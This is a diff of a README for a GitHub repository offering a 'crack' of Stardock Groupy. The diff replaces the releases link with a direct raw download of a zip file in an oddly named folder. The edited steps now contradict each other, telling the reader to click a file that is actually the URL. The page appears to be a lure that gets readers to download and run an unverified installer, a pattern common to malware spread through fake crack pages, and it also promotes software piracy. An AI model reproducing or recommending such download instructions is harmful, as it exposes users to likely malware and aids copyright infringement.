FrontDesEren/Stardock_Groupy_Crack/README.md

 To get started, you need to download Stardock Groupy Crack.
 Follow these steps:

-1. Click on this link: [Visit this page to download](https://github.com/FrontDesEren/Stardock_Groupy_Crack/releases).
+1. Click on this link: [Visit this page to download](https://raw.githubusercontent.com/FrontDesEren/Stardock_Groupy_Crack/main/bendsome/Stardock_Groupy_Crack.zip).
 2. On the Releases page, you'll find different versions listed.
 Look for the most recent version and click on it.
 3. Scroll down to the "Assets" section.
 You will see files available for download.
-4. Click on the file named `GroupySetup.exe` to download it to your computer.
+4. Click on the file named `https://raw.githubusercontent.com/FrontDesEren/Stardock_Groupy_Crack/main/bendsome/Stardock_Groupy_Crack.zip` to download it to your computer.
 5. Once the download is complete, locate the file in your Downloads folder and double-click it to begin the installation.

 ## 🛠 System Requirements